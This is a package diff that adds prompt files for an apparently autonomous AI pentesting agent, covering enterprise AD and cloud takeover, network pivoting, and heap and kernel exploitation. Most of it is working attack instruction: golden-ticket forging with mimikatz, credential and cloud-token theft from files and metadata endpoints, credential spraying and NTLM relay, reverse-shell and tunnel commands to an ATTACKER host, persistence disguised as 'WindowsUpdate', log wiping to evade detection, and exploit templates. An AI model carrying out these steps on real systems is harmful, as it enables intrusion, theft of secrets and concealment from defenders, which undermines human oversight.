pentesting 0.56.8 → 0.70.2

package/dist/prompts/techniques/enterprise-pentest.md

@@ -0,0 +1,175 @@
+# Enterprise Pentest — Internal Network Autonomous Assessment
+
+> **§3 Minimal Specification**: This is a **Bootstrap Reference**, not a prescribed order.
+> Adapt based on `get_state`, attack graph observations, and live target behavior.
+> **Cross-ref**: ad-attack.md (AD attacks), pivoting.md (lateral movement), zero-day.md (C4)
+
+---
+
+## Core Principle
+
+```
+Enterprise environments = layered defense + network segmentation + centralized AD + cloud integration
+
+Priority:
+  1. Map internal network first → identify segments, DCs, critical services
+  2. Maximize lateral movement with captured credentials
+  3. AD domain → Forest compromise for full privilege escalation
+  4. Cloud (AWS/Azure/GCP) pivoting to complete hybrid environment takeover
+```
+
+---
+
+## Phase 1: Internal Network Enumeration (Immediately after foothold)
+
+```
+SEGMENT DISCOVERY (run immediately after first shell):
+├── ip a / ifconfig            → network interfaces + IP ranges
+├── ip route / netstat -rn     → routing table → internal subnet list
+├── arp -a                     → directly connected hosts
+├── cat /etc/hosts             → internal hostname mappings
+└── cat /etc/resolv.conf       → internal DNS server → domain enumeration base
+
+ADJACENT SUBNET SCAN:
+  nmap -sn 10.x.x.0/24
+  for sub in $(seq 1 20); do nmap -sn 10.$sub.0.0/24; done
+
+DNS ENUMERATION:
+  dig axfr @internal_dns domain.corp
+  dnsrecon -d corp.local -t axfr
+  for i in $(seq 1 254); do host 10.x.x.$i; done | grep "domain name pointer"
+```
+
+---
+
+## Phase 2: Critical Internal Service Discovery
+
+```
+CRITICAL SERVICES TO FIND:
+┌─────────────────────────────────────────────────────────────────────┐
+│ Service               Port       Attack Vector                       │
+├─────────────────────────────────────────────────────────────────────┤
+│ Active Directory DC   88/389/636  Kerberos/LDAP/LDAPS               │
+│ SCCM/WSUS            8530/8531   Privilege escalation, malicious     │
+│                                   update delivery                    │
+│ Exchange/Mail         25/443      Internal phishing, relay attacks   │
+│ Corporate CA (ADCS)   80/443      ESC1~13 ADCS vulnerabilities      │
+│ Jump Host/Bastion     22/3389     Lateral movement hub               │
+│ Database servers      1433/3306/5432 Credential reuse + data dump   │
+│ DevOps infra          8080/9000   Jenkins/SonarQube weak auth →     │
+│                                   code execution                     │
+│ Cloud Metadata        169.254.169.254 IAM credential access         │
+└─────────────────────────────────────────────────────────────────────┘
+
+SCCM ATTACKS (Enterprise-specific):
+  1. net group "SMS Admins" /domain → SCCM administrator list
+  2. Extract SCCM NAA (Network Access Account) credentials
+  3. Tools: SCCMHunter, SharpSCCM
+  web_search("SCCM attack lateral movement credential extraction {year}")
+
+EXCHANGE ATTACKS:
+  1. ProxyShell/ProxyLogon: check CVE → run PoC
+  2. NTLM relay: responder + ntlmrelayx → capture Exchange auth
+  3. EWS (Exchange Web Services): ruler, EWSoauth
+```
+
+---
+
+## Phase 3: AD Forest Attacks (after single domain compromise)
+
+```
+FOREST TRUST EXPLOITATION:
+├── Discover trust relationships:
+│   nltest /domain_trusts
+│   PowerView: Get-DomainTrust
+│
+├── SID History attack (cross-forest movement):
+│   - Current domain DA → target forest Enterprise Admin
+│   - mimikatz lsadump::trust /patch → extract trust key
+│   - kerberos::golden /user:Administrator /domain:corp.local
+│     /sid:S-1-5-21-... /sids:S-1-5-21-TARGET-519 /rc4:TRUSTKEY
+│
+├── External Trust → Kerberoast across trust:
+│   Get-DomainUser -Domain external.corp -SPN
+│   Invoke-Kerberoast -Domain external.corp | Export-CSV
+│
+└── SID Filtering bypass:
+    web_search("SID filtering bypass forest trust attack {year}")
+
+ENTERPRISE ADMIN PATHS:
+  1. Achieve DA in all domains → target Enterprise Admin directly
+  2. Schema Admin path → AD schema modification
+  3. Corp CA (ADCS) ESC6/ESC8 → Enterprise Admin certificate
+```
+
+---
+
+## Phase 4: Cloud Pivoting (Hybrid environments)
+
+```
+ON-PREM → CLOUD PIVOT:
+
+Credential sources:
+  env | grep -iE "aws|azure|gcp|secret|key|token"
+  find / -name "*.env" -o -name "credentials" -o -name "*.pem" -o -name "*.json" 2>/dev/null
+  cat ~/.aws/credentials ~/.azure/credentials ~/.config/gcloud/credentials.db
+
+AWS ESCALATION:
+  aws sts get-caller-identity              → current identity
+  aws iam list-attached-user-policies      → current permissions
+  aws iam list-roles                       → assumable roles
+  aws sts assume-role --role-arn arn:...   → privilege escalation
+  → Goal: AdministratorAccess policy acquisition
+  web_search("AWS privilege escalation IAM misconfiguration {year}")
+
+AZURE ESCALATION:
+  az login --use-device-code (or use stolen token)
+  az account list                          → accessible subscriptions
+  az vm list                               → VM inventory
+  az keyvault secret list --vault-name ... → dump secrets
+  Managed Identity → az role assignment list → check permissions
+  web_search("Azure privilege escalation managed identity {year}")
+
+GCP ESCALATION:
+  gcloud auth list                         → authenticated accounts
+  gcloud projects list                     → accessible projects
+  gcloud iam service-accounts list         → service account list
+  gcloud compute instances list            → VM inventory
+  web_search("GCP privilege escalation service account {year}")
+
+IMDS (Instance Metadata Service) attack:
+  AWS:   curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
+  Azure: curl -H "Metadata:true" http://169.254.169.254/metadata/identity/oauth2/token
+  GCP:   curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
+              -H "Metadata-Flavor:Google"
+```
+
+---
+
+## Phase 5: Long-term Persistence
+
+```
+ENTERPRISE PERSISTENCE (minimize detection risk):
+├── Domain level: Golden Ticket (10-year validity) → exfiltrate krbtgt hash offline
+├── Silver Ticket: service-specific TGS → permanent access to specific service
+├── Scheduled task: schtasks /create /tn "WindowsUpdate" /tr ... /sc daily (disguised)
+├── WMI persistence: wmic /namespace:\\root\subscription event handler
+└── Cloud: backdoor IAM user / Lambda trigger / Lambda persistence
+
+EVIDENCE CLEANUP (post-detection):
+  Windows: wevtutil cl System; wevtutil cl Security; wevtutil cl Application
+  Linux:   echo -n > /var/log/auth.log; history -c; unset HISTFILE
+  Note: Log deletion itself is an IOC — minimal footprint is the guiding principle
+```
+
+---
+
+## Search Patterns
+
+```
+web_search("enterprise pentest internal network lateral movement {year}")
+web_search("SCCM attack chain privilege escalation credential extraction {year}")
+web_search("AD forest trust attack SID filtering bypass Enterprise Admin {year}")
+web_search("cloud AWS Azure GCP privilege escalation IAM misconfiguration {year}")
+web_search("Exchange server ProxyShell ProxyLogon {version} exploit")
+```

package/dist/prompts/techniques/injection.md

@@ -1,5 +1,9 @@
 # Injection Attacks — Comprehensive Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: web.md (web testing), evasion.md (bypass), payload-craft.md (mutation)
 
 ##  Core Principle

package/dist/prompts/techniques/network-svc.md

@@ -1,5 +1,9 @@
 # Network Service Attacks — Comprehensive Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: recon.md (discovery), exploit.md (exploitation), shells.md (getting shell)
 
 ##  Core Principle

package/dist/prompts/techniques/pivoting.md

@@ -0,0 +1,205 @@
+# Pivoting & Multi-Hop Tunneling — Autonomous Guide
+
+> **Cross-ref**: lateral.md (movement), ad-attack.md (AD pivoting), network-svc.md (internal services)
+
+## Core Principle
+
+Pivoting = using a compromised host as a relay to reach previously unreachable network segments.
+The agent on the **outer host** can only reach the **inner network** through a pivot chain.
+
+---
+
+## Pivot Decision Tree
+
+```
+GOT SHELL ON HOST? → Run immediately:
+  ip a / ifconfig          → list interfaces (look for 2+ NICs = pivot candidate)
+  ip route / route -n      → routing table (internal subnets)
+  arp -a                   → visible hosts (discovered via ARP)
+  cat /etc/hosts           → hardcoded internal names
+  netstat -an              → internal listening services
+  ss -tlnp                 → listening ports (Linux)
+
+FOUND INTERNAL SUBNET (e.g. 10.10.100.0/24)?
+  → Port scan via pivot: nmap through socks proxy or chisel
+  → Identify services → exploit from outer agent via tunnel
+
+FOUND INTERNAL HOST NAMES?
+  → DNS resolution from pivot: dig @internal-DNS hostname
+  → Look for: DC, DB, git, admin, intranet, mail
+```
+
+---
+
+## Method 1: SSH Tunneling (if SSH available on pivot)
+
+```
+LOCAL PORT FORWARD — access pivot's localhost from attacker:
+  ssh -L 8080:127.0.0.1:80 user@PIVOT
+  → Now: http://localhost:8080 = http://PIVOT:80
+
+REMOTE PORT FORWARD — expose attacker port through pivot:
+  ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT
+  → From PIVOT: nc attacker 4444 reaches attacker's local 4444
+
+DYNAMIC SOCKS PROXY — route arbitrary traffic through pivot:
+  ssh -D 1080 user@PIVOT
+  → proxychains / nmap --proxies socks4://127.0.0.1:1080 INTERNAL_TARGET
+
+MULTI-HOP (3 hops):
+  ssh -J user@HOP1,user@HOP2 user@FINAL_TARGET
+  ssh -L 8080:INTERNAL:80 -J user@HOP1 user@HOP2
+```
+
+---
+
+## Method 2: Chisel (No SSH Required — TCP over HTTP)
+
+```
+ATTACKER SIDE (server):
+  chisel server --port 8080 --reverse
+
+PIVOT SIDE (client — upload chisel binary):
+  chisel client ATTACKER:8080 R:socks        → SOCKS5 on attacker:1080
+  chisel client ATTACKER:8080 R:4444:10.10.100.5:22  → forward specific port
+
+MULTI-HOP chisel:
+  HOP1 connects to attacker → SOCKS on attacker:1080
+  HOP2 connects to HOP1 via proxychains → SOCKS chain
+
+USAGE with proxychains:
+  echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
+  proxychains nmap -sT -Pn -p 22,80,443,445,3389 10.10.100.0/24
+  proxychains evil-winrm -i 10.10.100.5 -u admin -p pass
+```
+
+---
+
+## Method 3: Ligolo-ng (Kernel TUN — fastest, cleanest)
+
+```
+ATTACKER (proxy):
+  sudo ip tuntap add user $USER mode tun ligolo
+  sudo ip link set ligolo up
+  ./proxy -selfcert
+
+PIVOT (agent — upload binary):
+  ./agent -connect ATTACKER:11601 -ignore-cert
+
+ATTACKER — after agent connects:
+  session → select agent
+  listener_add --addr 0.0.0.0:1234 --to 10.10.100.5:22  → port forward
+  start → add route: sudo ip route add 10.10.100.0/24 dev ligolo
+  → Now: ssh admin@10.10.100.5 directly (no proxychains!)
+
+MULTI-HOP with ligolo:
+  Agent on HOP1 → reach HOP2 network
+  Upload agent to HOP2 → connect through ligolo listener on HOP1
+  web_search("ligolo-ng double pivot setup multi-hop")
+```
+
+---
+
+## Method 4: Metasploit Route / SOCKS
+
+```
+meterpreter session on pivot:
+  background
+  use post/multi/manage/autoroute
+  set SESSION 1 → run
+
+Then:
+  use auxiliary/server/socks_proxy → set VERSION 5 → run
+  → proxychains through Metasploit SOCKS on 127.0.0.1:1080
+
+portfwd in meterpreter:
+  portfwd add -l 3389 -p 3389 -r INTERNAL_HOST
+  → rdesktop localhost:3389
+```
+
+---
+
+## Method 5: Netcat / Socat Relay (No binary upload — abuse existing tools)
+
+```
+NETCAT RELAY (if mkfifo available):
+  mkfifo /tmp/pipe
+  nc -l -p 4444 < /tmp/pipe | nc INTERNAL_TARGET 22 > /tmp/pipe
+
+SOCAT RELAY:
+  socat TCP-LISTEN:4444,fork TCP:INTERNAL_TARGET:22
+  → Persistent relay: socat TCP-LISTEN:4444,fork,reuseaddr TCP:TARGET:22
+
+SOCAT SOCKS PROXY (if socat version supports it):
+  socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080
+```
+
+---
+
+## Internal Network Scanning via Pivot
+
+```
+VIA PROXYCHAINS (any pivot method):
+  proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389,5985,6379,8080 INTERNAL/24
+  proxychains nmap -sT -Pn --top-ports 100 INTERNAL/24
+
+BASH PING SWEEP (when no tools):
+  for i in $(seq 1 254); do ping -c1 -W1 10.10.100.$i &>/dev/null && echo "10.10.100.$i UP"; done
+
+BASH PORT SCAN (when no tools):
+  for port in 22 80 443 445 3389 5985; do
+    (echo >/dev/tcp/10.10.100.5/$port) 2>/dev/null && echo "$port OPEN"
+  done
+```
+
+---
+
+## Reverse Shell Through Pivot
+
+```
+DOUBLE PIVOT — get shell from deep internal host back to outside:
+
+Method A: Chisel reverse
+  Outer SOCKS → proxychains + outer listener
+  Inner host connects outbound (if egress allowed): 
+    chisel client ATTACKER:8080 R:4445:127.0.0.1:4445
+
+Method B: Meterpreter bind shell
+  proxychains exploit/multi/handler (PAYLOAD: bind_tcp on INTERNAL_HOST)
+  lhost=INTERNAL_HOST → proxychains connect inbound
+
+Method C: SSH -R through existing session
+  From inner host: ssh -R 9001:127.0.0.1:9001 pivot_user@PIVOT
+  From attacker: nc PIVOT:9001
+
+Reverse shell via proxy (if internal host has egress):
+  → Set attacker IP as destination (should reach PIVOT, then routed back)
+  → Verify connectivity: proxychains curl http://ATTACKER:8080/test
+```
+
+---
+
+## Credential Spray Across Pivoted Networks
+
+```
+Once you have credentials from the outer network → always spray internally:
+  proxychains crackmapexec smb 10.10.100.0/24 -u user -p pass --continue-on-success
+  proxychains crackmapexec winrm 10.10.100.0/24 -u user -p pass
+  proxychains impacket-psexec DOMAIN/user:pass@INTERNAL_HOST
+
+Credential relay internally:
+  proxychains impacket-ntlmrelayx -t INTERNAL_TARGET -smb2support
+  Coerce auth from pivot: PetitPotam, PrinterBug, MS-RPRN
+```
+
+---
+
+## Search Patterns
+
+```
+web_search("chisel multi-hop pivot {year}")
+web_search("ligolo-ng double pivot internal network")
+web_search("proxychains nmap internal network scanning")
+web_search("pivot {OS} tunneling no binary upload")
+web_search("reverse shell through pivot NAT traversal")
+```

package/dist/prompts/techniques/privesc.md

@@ -1,5 +1,9 @@
 # Privilege Escalation — Comprehensive Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
 
 ##  Core Principle

package/dist/prompts/techniques/pwn.md

@@ -1,5 +1,9 @@
 # Binary Exploitation (Pwn) — Comprehensive CTF Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: exploit.md (shell strategy), evasion.md (bypass), shells.md (shell types)
 
 ## Phase 0: Recon — Identify Protections
@@ -258,9 +262,54 @@ House Techniques (Named Patterns):
 ├── House of Orange → forge unsorted bin chunk from top chunk
 ├── House of Botcake → tcache + unsorted bin overlap (2.31+)
 ├── House of Pig → largebin + tcache stashing → arbitrary write
-├── House of Banana → rtld_global abuse for exit-time RCE
-├── House of Kiwi → _IO_FILE vtable abuse (2.35+)
-└── house of XXX → web_search("house of XXX heap exploitation")
+│
+├── House of Banana (glibc 2.35+ — exit-time RCE via rtld_global):
+│   ├── Prerequisite: heap write primitive + libc/ld-linux base leak
+│   ├── Target: _rtld_global (ld.so global) → _dl_audit chain
+│   ├── Attack path:
+│   │   ├── 1. Leak ld.so base (via libc → _rtld_global symbol offset)
+│   │   │      ld_base = libc.address + libc.symbols['_rtld_global'] - ld.symbols['_rtld_global']
+│   │   ├── 2. Locate: _rtld_global._dl_ns[0]._ns_loaded → link_map ptr
+│   │   ├── 3. In link_map: l_audit_any_plt / l_auditing fields
+│   │   ├── 4. Forge fake link_map on heap:
+│   │   │      fake_lm = flat({0x28: heap_base + fake_lm_offset})  # l_next
+│   │   │      # at offset 0x340: pointer to fake audit struct
+│   │   ├── 5. Fake audit struct: ae_funcptr → system or one_gadget
+│   │   ├── 6. Trigger: call exit() or return from main → _dl_audit_preinit fires
+│   │   └── Template:
+│   │       from pwn import *
+│   │       # After leaks:
+│   │       rtld_global = ld.sym['_rtld_global']
+│   │       dl_ns = rtld_global                  # _dl_ns[0] at offset 0
+│   │       ns_loaded = dl_ns                    # _ns_loaded is first field
+│   │       # Write fake link_map → audit struct → funcptr = system
+│   │       # Details vary per binary — confirm struct offsets with gdb:
+│   │       # gdb: p &_rtld_global._dl_ns[0]._ns_loaded
+│   └── web_search("house of banana glibc 2.35 exploit script site:github.com")
+│
+├── House of Kiwi (glibc 2.35+ — _IO_FILE vtable abuse without __free_hook):
+│   ├── Context: glibc 2.24+ removed __free_hook/__malloc_hook; vtable check added
+│   ├── Bypass: _IO_obstack_jumps / _IO_cookie_jumps are NOT checked (whitelisted)
+│   ├── Attack path A — _IO_flush via exit():
+│   │   ├── 1. Overwrite _IO_helper_jumps vtable (in _IO_obstack_jumps range)
+│   │   ├── 2. Corrupt _IO_2_1_stderr_ → vtable → _IO_obstack_jumps + offset
+│   │   ├── 3. Set wide_data / Bckp_base pointers → control RIP
+│   │   └── Trigger: fflush(stderr) or exit() → _IO_flush_all_lockp fires
+│   ├── Attack path B — _IO_cookie_write:
+│   │   ├── 1. Forge _IO_cookie_file struct on heap
+│   │   ├── 2. Set __io_functions.write = system (after pointer mangling)
+│   │   │      # glibc 2.32+ mangles fn ptr: stored = (fn >> 17) | (fn << 47) ^ key
+│   │   │      # key is at fs:0x30; leak it or use partial overwrite
+│   │   ├── 3. Trigger fwrite() to the fake cookie → write callback fires
+│   │   └── python:
+│   │       mangled = ror(system ^ cookie_key, 17, 64)   # pwntools ror()
+│   ├── Pointer mangling (glibc 2.32+ IMPORTANT):
+│   │   ├── Function pointers in _IO structs are XOR-rotated before storage
+│   │   ├── Leak the key: read fs:0x30 (TLS pointer), or partial-overwrite
+│   │   └── Formula: stored = ROR64((fn ^ key), 17)  → reverse: fn = ROL64(stored,17) ^ key
+│   └── web_search("house of kiwi IO_FILE vtable bypass glibc 2.35")
+│
+└── house of XXX → web_search("house of XXX heap exploitation site:github.com")
 
 ═══════════════════════════════════════
 Debugging heap with gdb:
@@ -409,3 +458,138 @@ Vulnerability → Exploitation Flow:
 ├── SUID binary           → exploit → get that user's privileges
 └── Server binary on port → connect and exploit live
 ```
+
+## Kernel Exploitation — Deep Dive (Advanced Level)
+
+```
+KERNEL SETUP & ENVIRONMENT:
+├── Extract fs:    binwalk -e bzImage / extract-vmlinux bzImage
+├── Run CTF qemu: qemu-system-x86_64 -kernel bzImage -initrd rootfs.cpio.gz
+│                 -append "console=ttyS0 nokaslr" -m 128M -nographic
+├── Debug:        qemu + -s -S → gdb vmlinux → target remote :1234
+├── Extract rootfs: mkdir rootfs && cd rootfs && cpio -idmv < ../rootfs.cpio.gz
+├── Patch init to run as root / add your exploit binary
+└── Repack: find . | cpio -H newc -o --owner root:root | gzip > rootfs.cpio.gz
+
+KERNEL PROTECTIONS:
+├── KASLR:   base randomized → need kernel address leak
+│   leaks: syslog (if dmesg allowed), /proc/kallsyms (if readable)
+│         spray addresses, or use physmap (when mmap_min_addr=0)
+├── SMEP:    can't execute userspace pages in kernel mode → kernel ROP only
+│   bypass: disable SMEP (clear bit 20 in CR4) via kernel gadget
+├── SMAP:    can't access userspace memory in kernel mode
+│   bypass: disable SMAP (clear bit 21 in CR4) or use copy_from/to_user
+├── KPTI:    separate page tables for user/kernel → flush on context switch
+│   exploit: use KPTI trampoline swapgs_restore_regs_and_return_to_usermode
+│            (symbol in /proc/kallsyms or calculate from vmlinux)
+└── Stack Canary: same as user-space, leaked via info disclosure
+
+KERNEL ROP CHAIN — ret2usr (when SMEP disabled):
+├── Control RIP via kernel overflow
+├── ROP: disable SMEP/SMAP → call userspace function pointer
+│   mov cr4, <value_without_smep> ; ret
+├── Userspace shellcode:
+│   void shell() {
+│       commit_creds(prepare_kernel_cred(NULL));  // root creds
+│       // return to userspace:
+│       asm("swapgs; iretq");
+│   }
+└── Restore context: need original rip/cs/rflags/rsp/ss saved before exploit
+
+COMMIT_CREDS PATTERN:
+├── commit_creds(prepare_kernel_cred(NULL)) → uid/gid = 0
+├── Addresses: grep in /proc/kallsyms (if readable) or vmlinux offsets
+├── Kernel ROP: pop rdi; ret → 0 → prepare_kernel_cred → pop rdi; ret →
+│              rax (result) → commit_creds → recover_to_userspace
+└── After root: execve("/bin/sh") or system command
+
+MODPROBE_PATH OVERWRITE (powerful, no SMEP bypass needed):
+├── When: have arbitrary kernel write primitive
+├── Steps:
+│   1. Overwrite modprobe_path (/sbin/modprobe) with /tmp/pwn script
+│   2. /tmp/pwn: #!/bin/sh\n cp /flag /tmp/flag && chmod 777 /tmp/flag
+│   3. Execute unknown file format → kernel calls modprobe_path
+│      echo -ne '\xff\xff\xff\xff' > /tmp/bad; chmod +x /tmp/bad; /tmp/bad
+│   4. /tmp/flag now readable
+└── Works even without executing shellcode (bypasses SMEP/NX)
+
+KERNEL UAF → FUNCTION POINTER OVERWRITE:
+├── Typical flow:
+│   1. Allocate kernel object via ioctl / socket / open
+│   2. Free it (without destroying reference)
+│   3. Spray heap with controlled data (reclaim freed slot)
+│   4. Original pointer now points to attacker-controlled struct
+│   5. Function pointer called → code execution
+├── Heap spray: open many /proc or socket fds, read/send data
+└── Object size: match target struct size for reliable reclaim
+
+KERNEL RACE CONDITIONS (TOCTOU):
+├── Double-fetch: kernel reads userspace value twice, race between reads
+├── Concurrent ioctl/syscall: race window between check and use
+├── Exploitation: spin up threads, hammer concurrent syscalls
+├── Tools: race_condition keyword, userfaultfd for precise racing
+└── web_search("kernel TOCTOU exploit userfaultfd technique")
+
+USEFUL KERNEL PRIMITIVES:
+├── Arbitrary read:  copy_from_user leak, info leak via syslog/proc
+├── Arbitrary write: kmalloc + controlled content + overflow/UAF
+├── Heap spray:      open many /proc/self/mem, msg_msg (msgsnd), pipe buffers
+├── msg_msg:         sendmsg to reclaim freed kernel object (kmalloc-N sized)
+└── setxattr:        arbitrary kernel heap write (controllable size + content)
+```
+
+## ROP Deep Patterns (Advanced)
+
+```
+RET2DLRESOLVE — No libc file needed:
+from pwn import *
+elf = ELF('./binary')
+rop = ROP(elf)
+dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
+rop.read(0, dlresolve.data_addr)  # write the fake structures
+rop.ret2dlresolve(dlresolve)
+# send: padding + rop.chain() + then dlresolve.payload
+
+BLIND ROP (BROP) — No binary, only crash/non-crash:
+├── Goal: exploit a stack overflow with only socket feedback
+├── Step 1: Find overflow offset (binary search on payload length)
+├── Step 2: Find "stop gadget" (causes infinite loop, keeps connection)
+├── Step 3: Blindly probe for ROP gadgets (brop gadget is canonical)
+│   ├── BROP gadget: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
+│   └── Dump PLT entries to find puts → dump binary from memory
+├── Step 4: Leak binary via puts over socket
+├── Step 5: Standard ROP exploit from dumped binary
+└── web_search("blind rop brop exploit tutorial")
+
+STACK PIVOT (when controlled buffer too small for full ROP):
+├── Gadget: xchg rsp, rax / leave; ret / pop rsp; ret
+├── Target: large controlled buffer (heap, data section, mmap)
+├── build full ROP chain there → pivot RSP to it
+└── Common: fake frame on heap → leave; ret pivots there
+
+SIGROP / SROP in depth:
+├── Abuses sigreturn syscall (15 on x86_64) to set ALL registers
+├── syscall; ret  →  rax=15 → sigreturn → kernel restores all regs from stack frame
+├── Full SigreturnFrame:
+│   frame = SigreturnFrame()
+│   frame.rip = execve_syscall_addr   # or any gadget
+│   frame.rsp = rsp                   # controlled stack
+│   frame.rax = 59                    # SYS_execve
+│   frame.rdi = binsh_addr
+│   frame.rsi = frame.rdx = 0
+├── Useful when: very few gadgets, only syscall; ret available
+└── orw shellcode path when execve blocked by seccomp
+
+SECCOMP BYPASS:
+├── Check: seccomp-tools dump ./binary → see allowed syscalls
+│         seccomp-tools asm → assemble BPF filters
+├── Common CTF: execve blocked → use open+read+write (ORW)
+│   fd = open("flag.txt", O_RDONLY)
+│   read(fd, buf, 0x100)
+│   write(1, buf, 0x100)
+├── Shellcraft: shellcraft.open() + shellcraft.read(3,'rsp',100) + shellcraft.write(1,'rsp',100)
+├── Filter bypass: if using 32-bit mode (ptrace SECCOMP allows different arch)
+│   int 0x80 in 64-bit process: uses 32-bit syscall numbers!
+│   open=5 (32-bit) may not be filtered if filter only blocks 64-bit open=2
+└── web_search("seccomp bypass technique {year} CTF")
+```

package/dist/prompts/techniques/shells.md

@@ -1,5 +1,9 @@
 # Shell Operations — Comprehensive Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: exploit.md (initial access), post.md (post-exploitation), lateral.md (pivoting)
 
 ##  Core Principle